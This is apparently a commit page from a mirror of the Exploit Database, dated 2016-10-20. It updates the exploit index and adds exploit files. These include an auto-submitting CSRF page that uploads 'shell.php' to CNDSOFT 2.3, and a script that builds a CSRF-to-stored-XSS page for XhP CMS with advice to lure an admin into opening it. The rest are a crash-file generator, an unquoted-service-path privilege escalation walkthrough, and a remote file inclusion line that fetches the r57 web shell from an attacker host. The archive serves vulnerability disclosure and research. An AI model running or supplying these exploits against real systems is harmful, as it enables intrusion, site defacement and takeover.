bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-20

Browse source 
13 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC)
PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow

PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit
PHP FFI Extension 5.0.5 - Local Safe_mode Bypass

PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)
PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow

Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit
Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop

Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)
Apple QuickTime < 7.2 - SMIL Remote Integer Overflow

Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow
Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow

Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)
Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow

Integramod nederland 1.4.2 - Remote File Inclusion
Integramod Nederland 1.4.2 - Remote File Inclusion

CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload

NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation
NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation

NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation

The Unarchiver 3.11.1 - '.tar.Z' Crash PoC
XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation
Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation
Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation
Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation
Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation
Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation
Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation
Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation
PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation
Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation
This commit is contained in:
Offensive Security 2016-10-20 05:01:17 +00:00
parent 557f116d02
commit 77b46b2163
20 changed files with 819 additions and 29 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

33
files.csv
View file

@ -3946,7 +3946,7 @@ id,file,description,date,author,platform,type,port
4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0
4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0
4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0
4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0
4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0
@ -3964,14 +3964,14 @@ id,file,description,date,author,platform,type,port
4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0
4309,platforms/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0
4310,platforms/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0
4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass",2007-08-23,NetJackal,windows,local,0
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0
4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0
4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0
4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0
4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
@ -4000,7 +4000,7 @@ id,file,description,date,author,platform,type,port
4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0
4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0
4348,platforms/windows/remote/4348.c,"PPStream - (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0
4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0
@ -4012,7 +4012,7 @@ id,file,description,date,author,platform,type,port
4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0
4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0
4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0
4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)",2007-09-03,"David Vaartjes",multiple,dos,0
4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0
4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0
4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0
@ -4081,10 +4081,10 @@ id,file,description,date,author,platform,type,port
4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0
4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0
4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow",2007-09-19,void,windows,remote,143
4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow",2007-09-19,void,windows,remote,143
4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0
4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",multiple,dos,0
4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0
4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0
4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0
@ -4115,7 +4115,7 @@ id,file,description,date,author,platform,type,port
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
4463,platforms/php/webapps/4463.txt,"Integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0
4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0
4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
@ -24162,6 +24162,7 @@ id,file,description,date,author,platform,type,port
26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0
26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0
26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0
26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
@ -36598,7 +36599,7 @@ id,file,description,date,author,platform,type,port
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@ -36652,7 +36653,7 @@ id,file,description,date,author,platform,type,port
40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0
40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0
40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
@ -36675,7 +36676,19 @@ id,file,description,date,author,platform,type,port
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
40579,platforms/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40580,platforms/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40581,platforms/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40582,platforms/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40585,platforms/windows/local/40585.txt,"Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40583,platforms/windows/local/40583.txt,"Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40584,platforms/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",php,webapps,0
40586,platforms/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40587,platforms/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0

Can't render this file because it is too large.

39
platforms/osx/dos/40570.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
import os, struct, sys
from mmap import mmap
if len(sys.argv) <= 1:
print "Usage: python Local_Crash_PoC.py [file name]"
exit()
file_name = sys.argv[1]
file_mod = open(file_name, 'r+b')
file_hash = file_mod.read()
def get_extension(file_name):
basename = os.path.basename(file_name)
extension = '.'.join(basename.split('.')[1:])
return '.' + extension if extension else None
def file_maping():
maping = mmap(file_mod.fileno(),0)
maping.seek(2)
maping.write_byte(struct.pack('B', 255))
maping.close()
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
os.popen('cp ' + file_name + ' ' + new_file_name)
file_mod = open(new_file_name, 'r+b')
file_maping()
file_mod.close()
print '[+] ' + 'Created file: ' + new_file_name

159
platforms/php/webapps/40575.html Executable file
View file

@ -0,0 +1,159 @@
*=========================================================================================================
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
*=========================================================================================================
Vulnerable URL and Parameter
========================================
Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
Vulnerable Parameter = &mesaj_baslik
TECHNICAL DETAILS & POC & POST DATA
========================================
POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
——
Content-Type: multipart/form-data;
boundary=---------------------------5035863528338
Content-Length: 1037
-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"
CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"
meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"
meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"
m@yop.com
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"
30000
-----------------------------5035863528338
Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
Content-Type: application/octet-stream
*<?php
phpinfo();
?>*
-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"
5200
-----------------------------5035863528338--
*CSRF PoC - File Upload (Shell.php)*
========================================
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "
http://site_name/ofis/index.php?is=kullanici_tanimla", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
xhr.withCredentials = true;
var body = "-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"utf8\"\r\n" +
"\r\n" +
"\xe2\x9c\x93\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
+
"\r\n" +
"CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
"\r\n" +
"meryem\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
+
"\r\n" +
"meryem\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
"\r\n" +
"m@yop.com\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"30000\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php \r\n" +
"\tphpinfo();\r\n" +
"\r\n" +
" ?\x3e\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
"\r\n" +
"5200\r\n" +
"-----------------------------5035863528338--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
========================================
*Access File : *http://www.site_name/path/personel_resimleri/shell.php
RISK
========================================
Attacker can arbitrary file upload.
--
Besim ALTINOK

73
platforms/php/webapps/40576.py Executable file
View file

@ -0,0 +1,73 @@
# Exploit Title: XhP CMS 0.5.1 - Cross-Site Request Forgery to Persistent Cross-Site Scripting
# Exploit Author: Ahsan Tahir
# Date: 19-10-2016
# Software Link: https://sourceforge.net/projects/xhp/
# Vendor: https://sourceforge.net/projects/xhp/
# Google Dork: inurl:Powered by XHP CMS
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsan-tahir.com
# Category: webapps
# Version: 0.5.1
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-=-=-=+
| __ ___ ____ ____ __ __ ____ |
| \ \/ / |__ | _ \ / ___| \/ / ___| |
| \ /| '_ \| |_) | | | | |\/| \___ \ |
| / \| | | | __/ | |___| | | |___) | |
| /_/\_\_| |_|_| \____|_| |_|____/ |
| > XhP CMS 0.5.1 - CSRF to Persistent XSS |
| > Exploit Author & Script Coder: Ahsan Tahir|
+=====-----=====-----======-----=====---==-=-=+
'''
def xhpcsrf():
print banner
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
csrfhtmlcode = '''
<html>
<!-- CSRF PoC -->
<body>
<form action="http://%s/action.php?module=users&action=process_general_config&box_id=29&page_id=0&basename=index.php&closewindow=&from_page=page=0&box_id=29&action=display_site_settings&errcode=0" method="POST" enctype="multipart/form-data" name="exploit">
<input type="hidden" name="frmPageTitle" value=""accesskey&#61;z&#32;onclick&#61;"alert&#40;document&#46;domain&#41;" />
<input type="hidden" name="frmPageUrl" value="http&#58;&#47;&#47;localhost&#47;xhp&#47;" />
<input type="hidden" name="frmPageDescription" value="&#13;" />
<input type="hidden" name="frmLanguage" value="english" />
<input type="submit" value="Submit request" />
</form>
<script type="text/javascript" language="JavaScript">
//submit form
document.exploit.submit();
</script>
</body>
</html>
''' % url
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url)
print("")
xhpcsrf()

77
platforms/php/webapps/40584.txt Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Intel(R) PROSet/Wireless WiFi Software - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 15.01.1000.0927
# Tested on: Windows 7 Professional
The Intel(R) PROSet/Wireless WiFi Software installs 2 services with unquoted service paths.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
Rebooting the system or restarting either service will run the malicious executable with elevated privileges.
This was tested on version 15.01.1000.0927, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc EvtEng
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EvtEng
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Intel\WiFi\bin\EvtEng.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) PROSet/Wireless Event Log
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc RegSrvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RegSrvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) PROSet/Wireless Registry Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

2
platforms/php/webapps/4463.txt
View file

@ -11,7 +11,7 @@ Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
includes/archive/archive_topic.php?phpbb_root_path=http://attacker/shells/r57.txt?
------------------------

2
platforms/php/webapps/4509.txt
View file

@ -1,5 +1,5 @@
TikiWiki 1.9.8 Remote PHP Injection Vulnerability
Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
# milw0rm.com [2007-10-10]

6
platforms/windows/dos/40536.py
View file

@ -1,7 +1,5 @@
'''
#Hi guys
#Title: Firefox 49.0.1 crash Denial of Service
#Date: 15 Oct 2016
#Author: sultan albalawi
@ -10,7 +8,7 @@
#Open link in firefox
#Double click on the Click You will see the report that there are crach
#thanks
.........................................................................
'''

5
platforms/windows/local/40528.txt
View file

@ -3,9 +3,8 @@
